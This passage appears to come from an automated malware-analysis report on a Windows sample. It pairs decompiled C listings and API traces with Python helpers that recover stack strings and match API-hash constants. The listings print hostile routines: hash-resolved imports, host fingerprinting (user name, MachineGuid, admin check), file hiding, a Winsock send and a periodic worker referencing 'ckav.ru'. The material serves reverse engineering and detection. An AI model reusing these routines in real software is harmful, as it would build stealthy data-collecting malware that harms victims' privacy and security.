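_v44 = _t84; _v40 = _t76; _v38 = _t84; _v36 = _t83; _v34 = _t78; _v32 = _t85;
_v30 = _t85; _v22 = _t85; _v18 = _t76; _v16 = _t84; _v14 = _t83; _v12 = _t78;
_v10 = _t85; _v8 = _t85; _v6 = 0;
_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
"""

ASSIGN = re.compile(r"^\s*(_[tv]\d+)\s*=\s*(.+?)\s*$")


def _value(rhs: str, temps: dict):
    """Resolve a right-hand side to an integer; None for calls, addresses or unknown temps."""
    if re.fullmatch(r"_t\d+", rhs):
        return temps.get(rhs)
    try:
        return int(rhs, 0)
    except ValueError:
        return None


def stack_slots(decomp: str) -> dict:
    """Map each _vNN stack slot (NN = bytes below the frame pointer) to the value it ends up holding."""
    temps, slots = {}, {}
    for stmt in re.split(r"[;\n]", decomp):
        m = ASSIGN.match(stmt)
        if not m:
            continue
        name, rhs = m.groups()
        val = _value(rhs, temps)
        if val is None:
            continue  # not a literal or staged temp: a handle, a pointer, a call result
        if name.startswith("_t"):
            temps[name] = val
        else:
            slots[int(name[2:])] = val
    return slots


def recover_stack_strings(decomp: str) -> list:
    """Walk the slots from highest offset (lowest address) downwards and split on NUL terminators."""
    slots = stack_slots(decomp)
    strings, cur = [], []
    for off in sorted(slots, reverse=True):
        val = slots[off]
        if val == 0:
            if cur:
                strings.append("".join(cur))
                cur = []
        elif 0x20 <= val < 0x7F:
            cur.append(chr(val))  # printable ASCII stored as a 16-bit WCHAR
    if cur:
        strings.append("".join(cur))
    return strings


if __name__ == "__main__":
    for s in recover_stack_strings(SAMPLE):
        print(s)
```

The recovered names are the three passed, in that order, to the import resolved from hash 0xe811e8d4; the parser deliberately ignores any assignment whose right-hand side is a call or an address, so the same routine can be pointed at the other listings on this page without picking up handles as characters.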

                                          C-Code - Quality: 100%
                                          			// Appends _a12 bytes from _a8 to file _a4: CreateFileW with GENERIC_READ | GENERIC_WRITE
                                          			// (0xc0000000) and OPEN_ALWAYS (4), SetFilePointer(h, 0, 0, FILE_END = 2), then WriteFile.
                                          			// Returns 1 on success, 0 otherwise.
                                          			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                                          				long _v8;
                                          				void* _t7;
                                          				long _t10;
                                          				void* _t21;
                                          				struct _OVERLAPPED* _t24;
                                          
                                          				_t14 = __ebx;
                                          				_t24 = 0;
                                          				_v8 = 0;
                                          				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                                          				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                                          				_t21 = _t7;
                                          				if(_t21 != 0xffffffff) {
                                          					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                                          					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                                          					if(_t10 != 0xffffffff) {
                                          						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                                          						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                                          						_t24 =  !=  ? 1 : 0; // decompiler dropped the operands here; presumably the WriteFile result
                                          					}
                                          					E00403C40(_t21); // executed
                                          				}
                                          				return _t24;
                                          			}

                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                          • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreatePointerWrite
                                          • String ID:
                                          • API String ID: 3672724799-0
                                          • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                          • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                          • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                          • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                          Uniqueness

                                          Uniqueness Score: -1.00%
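Every Win32 call in the listings on this page is preceded by E004031E5(..., <32-bit constant>, ...), and the tracer then records the API that was actually invoked, so the page itself yields a table of constant-to-API pairs (0xe9fabb88 before CreateFileW, 0xd4ead4e2 before VirtualAlloc, 0xcd0c9940 before ReadFile, 0xd1e96fcd before SetErrorMode, 0xcf167df4 before CreateMutexW, 0xeebaae5b before SetFilePointer, 0xc148f916 before WriteFile, 0xfcae4162 before CreateThread). Three constants (0xf9435d1e, 0xf53ecacb, 0xe811e8d4) were not paired with a traced name. The following is an added Python example, not part of the report or of the sample: it checks four common API-hash algorithms against the traced pairs and, only if one reproduces all of them, uses that algorithm to resolve the untraced constants against a candidate name list. The report does not say which hash this sample uses, so the example may well report that none of the four matches, in which case E004031E5 has to be read directly; the four algorithms and the candidate list are my assumptions, the pairs are from the page.

```python
import zlib

MASK = 0xFFFFFFFF


def ror32(v: int, n: int) -> int:
    n &= 31
    return ((v >> n) | (v << (32 - n))) & MASK


def h_ror13(name: str) -> int:
    """Metasploit-style: rotate the running hash right by 13, add the next byte."""
    h = 0
    for b in name.encode():
        h = (ror32(h, 13) + b) & MASK
    return h


def h_fnv1a32(name: str) -> int:
    h = 0x811C9DC5
    for b in name.encode():
        h = ((h ^ b) * 0x01000193) & MASK
    return h


def h_djb2(name: str) -> int:
    h = 5381
    for b in name.encode():
        h = (h * 33 + b) & MASK
    return h


def h_crc32(name: str) -> int:
    return zlib.crc32(name.encode()) & MASK


# Assumed candidate algorithms; the report does not identify the one E004031E5 implements.
ALGORITHMS = {"ror13": h_ror13, "fnv1a32": h_fnv1a32, "djb2": h_djb2, "crc32": h_crc32}

# Pairs read off the listings: the constant handed to E004031E5 immediately before the traced call.
KNOWN_PAIRS = {
    0xE9FABB88: "CreateFileW",
    0xD4EAD4E2: "VirtualAlloc",
    0xCD0C9940: "ReadFile",
    0xD1E96FCD: "SetErrorMode",
    0xCF167DF4: "CreateMutexW",
    0xEEBAAE5B: "SetFilePointer",
    0xC148F916: "WriteFile",
    0xFCAE4162: "CreateThread",
}

# Constants the tracer did not pair with a name.
UNTRACED = [0xF9435D1E, 0xF53ECACB, 0xE811E8D4]

# Assumed candidate names (plausible neighbours of the traced APIs, my guess, not from the report).
CANDIDATES = ["GetFileSize", "GetFileSizeEx", "VirtualFree", "LoadLibraryW", "LoadLibraryA",
              "GetModuleHandleW", "CloseHandle", "DeleteFileW", "CopyFileW"]


def matching_algorithms(pairs: dict, algorithms: dict = ALGORITHMS) -> list:
    """Names of the algorithms that reproduce every (constant -> api) pair."""
    return [name for name, fn in algorithms.items()
            if all(fn(api) == const for const, api in pairs.items())]


def resolve(const: int, candidates: list, algo_names: list) -> list:
    """(algorithm, api) pairs for which hashing a candidate name yields const."""
    return [(alg, api) for alg in algo_names for api in candidates
            if ALGORITHMS[alg](api) == const]


if __name__ == "__main__":
    algos = matching_algorithms(KNOWN_PAIRS)
    if not algos:
        print("none of", list(ALGORITHMS), "reproduces the traced pairs; read E004031E5 directly")
    for const in UNTRACED:
        print(hex(const), resolve(const, CANDIDATES, algos) or "unresolved")
```

Validating a candidate algorithm against the traced pairs first is what makes the method safe: a single accidental collision on one constant proves nothing, but an algorithm that reproduces all eight observed pairs can be trusted to name the three untraced ones, and a ground-truth table like KNOWN_PAIRS is exactly what an instrumented run gives you for free.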

                                          C-Code - Quality: 34%
                                          			// Periodic worker. On the first call it allocates a 0x2bc-byte context at 0x49fde0, sets the
                                          			// interval global 0x49fddc to 0x927c0 (600000, i.e. 10 min if milliseconds) and fills the
                                          			// context, including the string "ckav.ru". On later calls it starts a thread at E0041289A and
                                          			// calls E004067C4(0xea60) (60000, consistent with a one-minute millisecond sleep).
                                          			// The listing is cut off on the page.
                                          			E00412D31(void* __ecx, void* __edi) {
                                          				long _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				char _v40;
                                          				void* __ebx;
                                          				intOrPtr* _t10;
                                          				void* _t11;
                                          				void* _t25;
                                          				void* _t26;
                                          				void* _t27;
                                          				void* _t35;
                                          				void* _t53;
                                          				char* _t57;
                                          				void* _t58;
                                          				void* _t61;
                                          				void* _t64;
                                          				void* _t65;
                                          				intOrPtr* _t66;
                                          				void* _t67;
                                          				void* _t68;
                                          				void* _t69;
                                          				void* _t70;
                                          				void* _t71;
                                          				void* _t72;
                                          				void* _t73;
                                          
                                          				_t53 = __ecx;
                                          				_t10 =  *0x49fde0;
                                          				_t68 = _t67 - 0x24;
                                          				 *0x49fddc = 0x927c0;
                                          				 *0x49fde4 = 0;
                                          				_t75 = _t10;
                                          				if(_t10 != 0) {
                                          					L16:
                                          					_push(1);
                                          					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                                          					_t61 = _t11;
                                          					_t68 = _t68 + 0xc;
                                          					if(_t61 != 0) {
                                          						E004031E5(0, 0, 0xfcae4162, 0, 0);
                                          						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                                          					}
                                          					L004067C4(0xea60); // executed
                                          					_pop(_t53);
                                          				} else {
                                          					_push(__edi);
                                          					 *0x49fde0 = E004056BF(0x2bc);
                                          					E00413DB7(_t53, _t75,  &_v40);
                                          					_t57 =  &_v24;
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					E004058D4( *0x49fde0, 0x12);
                                          					E004058D4( *0x49fde0, 0x28);
                                          					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                                          					_t69 = _t68 + 0x28;
                                          					_t64 = E0040632F();
                                          					_push(0);
                                          					_push(1);
                                          					if(_t64 == 0) {
                                          						_push(0);
                                          						_push( *0x49fde0);
                                          						E00405872();
                                          						_t70 = _t69 + 0x10;
                                          					} else {
                                          						_push(_t64);
                                          						_push( *0x49fde0);
                                          						E00405872();
                                          						E00402BAB(_t64);
                                          						_t70 = _t69 + 0x14;
                                          					}
                                          					_t58 = E00406130(_t57);
                                          					_push(0);
                                          					_push(1);
                                          					_t77 = _t64;
                                          					if(_t64 == 0) {
                                          						_push(0);
                                          						_push( *0x49fde0);
                                          						_t25 = E00405872();
                                          						_t71 = _t70 + 0x10; // executed
                                          					} else {
                                          						_push(_t58);
                                          						_push( *0x49fde0);
                                          						E00405872();
                                          						_t25 = E00402BAB(_t58);
                                          						_t71 = _t70 + 0x14;
                                          					}
                                          					_t26 = E004061C3(_t25, 0, _t77); // executed
                                          					_t65 = _t26;
                                          					_push(0);
                                          					_push(1);
                                          					if(_t65 == 0) {
                                          						_push(0);
                                          						_push( *0x49fde0);
                                          						_t27 = E00405872();
                                          						_t72 = _t71 + 0x10;
                                          					} else {
                                          						_push(_t65);
                                          						_push( *0x49fde0);
                                          						E00405872();
                                          						_t27 = E00402BAB(_t65);
                                          						_t72 = _t71 + 0x14;
                                          					}
                                          					_t66 = E00406189(_t27);
                                          					_t79 = _t66;
                                          					if(_t66 == 0) {
                                          						E00405781( *0x49fde0, 0);
                                          						E00405781( *0x49fde0, 0);
                                          						_t73 = _t72 + 0x10;
                                          					} else {
                                          						E00405781( *0x49fde0,  *_t66);
                                          						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                                          						E00402BAB(_t66);
                                          						_t73 = _t72 + 0x14;
                                          					}
                                          					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                                          					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                                          					_t35 = E0040642C(_t79); // executed
                                          					E004058D4( *0x49fde0, _t35);
                                          					E004058D4( *0x49fde0, _v24);
                                          					E004058D4( *0x49fde0, _v20);
                                          					E004058D4( *0x49fde0, _v16);
                                          					E004058D4( *0x49fde0, _v12);
                                          					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                                          					_t68 = _t73 + 0x48;
                                          				}
                                          				_t80 =  *0x49fde4;
                                          				if( *0x49fde4 == 0) {
                                          					_t10 =  *0x49fde0;
                                          					goto L16;
                                          				}
                                          				return E00405695(_t53,  *0x49fde0);
                                          			}

                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                            • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                            • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                            • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$CreateFreeProcessThread_wmemset
                                          • String ID: ckav.ru
                                          • API String ID: 2915393847-2696028687
                                          • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                          • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                          • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                          • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040632F() {
                                          				char _v8;
                                          				void* _t4;
                                          				void* _t7;
                                          				void* _t16;
                                          
                                          				_t16 = E00402B7C(0x208);
                                          				if(_t16 == 0) {
                                          					L4:
                                          					_t4 = 0;
                                          				} else {
                                          					E0040338C(_t16, 0, 0x104);
                                          					_t1 =  &_v8; // 0x4143e8
                                          					_v8 = 0x208;
                                          					_t7 = E00406069(_t16, _t1); // executed
                                          					if(_t7 == 0) {
                                          						E00402BAB(_t16);
                                          						goto L4;
                                          					} else {
                                          						_t4 = _t16;
                                          					}
                                          				}
                                          				return _t4;
                                          			}

                                          APIs
                                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                          • _wmemset.LIBCMT ref: 0040634F
                                            • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateNameProcessUser_wmemset
                                          • String ID: CA
                                          • API String ID: 2078537776-1052703068
                                          • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                          • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                          • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                                          • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                                          				int _t7;
                                          				void* _t8;
                                          
                                          				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                                          				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                                          				return _t7;
                                          			}

                                          APIs
                                          • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: InformationToken
                                          • String ID: IDA
                                          • API String ID: 4114910276-365204570
                                          • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                          • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                          • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                          • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                                          				_Unknown_base(*)()* _t5;
                                          				void* _t6;
                                          
                                          				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                                          				_t1 =  &_a8; // 0x403173
                                          				_t5 = GetProcAddress(_a4,  *_t1); // executed
                                          				return _t5;
                                          			}

                                          APIs
                                          • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc
                                          • String ID: s1@
                                          • API String ID: 190572456-427247929
                                          • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                          • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                          • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                          • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E00404A52(void* _a4, char* _a8, char* _a12) {
                                          				void* _v8;
                                          				int _v12;
                                          				void* __ebx;
                                          				char* _t9;
                                          				char* _t10;
                                          				long _t13;
                                          				char* _t27;
                                          
                                          				_push(_t21);
                                          				_t9 = E00402B7C(0x208); // executed
                                          				_t27 = _t9;
                                          				if(_t27 == 0) {
                                          					L4:
                                          					_t10 = 0;
                                          				} else {
                                          					E00402B4E(_t27, 0, 0x208);
                                          					_v12 = 0x208;
                                          					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                                          					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                                          					if(_t13 != 0) {
                                          						E00402BAB(_t27);
                                          						goto L4;
                                          					} else {
                                          						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                                          						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                                          						E00404A39(_v8); // executed
                                          						_t10 = _t27;
                                          					}
                                          				}
                                          				return _t10;
                                          			}

                                          APIs
                                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                            • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                          • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                          • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateOpenProcessQueryValue
                                          • String ID:
                                          • API String ID: 1425999871-0
                                          • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                          • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                          • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                                          • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 40%
                                          			E004060BD(void* __eflags) {
                                          				signed int _v8;
                                          				char _v12;
                                          				short _v16;
                                          				char _v20;
                                          				void* __ebx;
                                          				intOrPtr* _t12;
                                          				signed int _t13;
                                          				intOrPtr* _t14;
                                          				signed int _t15;
                                          				void* _t24;
                                          
                                          				_v16 = 0x500;
                                          				_v20 = 0;
                                          				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                                          				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                          				_v8 = _t13;
                                          				if(_t13 != 0) {
                                          					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                                          					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                                          					asm("sbb eax, eax");
                                          					_v8 = _v8 &  ~_t15;
                                          					E0040604F(_v12);
                                          					return _v8;
                                          				}
                                          				return _t13;
                                          			}

                                          APIs
                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CheckMembershipToken
                                          • String ID:
                                          • API String ID: 1351025785-0
                                          • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                          • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                          • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                          • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                                          				void* _t3;
                                          				int _t5;
                                          
                                          				_t3 = E00403D4D(__eflags, _a4); // executed
                                          				if(_t3 == 0) {
                                          					__eflags = 0;
                                          					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                                          					_t5 = CreateDirectoryW(_a4, 0); // executed
                                          					return _t5;
                                          				} else {
                                          					return 1;
                                          				}
                                          			}

                                          APIs
                                          • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CreateDirectory
                                          • String ID:
                                          • API String ID: 4241100979-0
                                          • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                          • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                          • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                          • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E0040642C(void* __eflags) {
                                          				short _v40;
                                          				intOrPtr* _t6;
                                          				void* _t10;
                                          
                                          				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                                          				 *_t6( &_v40); // executed
                                          				return 0 | _v40 == 0x00000009;
                                          			}

                                          APIs
                                          • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: InfoNativeSystem
                                          • String ID:
                                          • API String ID: 1721193555-0
                                          • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                          • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                          • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                          • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				intOrPtr _t5;
                                          
                                          				_t5 = _a12;
                                          				if(_t5 == 0) {
                                          					_t5 = E00405D0B(_a8) + 1;
                                          				}
                                          				__imp__#19(_a4, _a8, _t5, 0); // executed
                                          				return _t5;
                                          			}

                                          APIs
                                          • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                          • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                          • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                          • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                                          				int _t6;
                                          				void* _t7;
                                          
                                          				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                                          				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                                          				return _t6;
                                          			}

                                          APIs
                                          • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileMove
                                          • String ID:
                                          • API String ID: 3562171763-0
                                          • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                          • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                          • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                          • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Startup
                                          • String ID:
                                          • API String ID: 724789610-0
                                          • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                          • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                          • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                          • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040427D(WCHAR* _a4) {
                                          				int _t4;
                                          				void* _t5;
                                          
                                          				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                                          				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                                          				return _t4;
                                          			}

                                          APIs
                                          • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
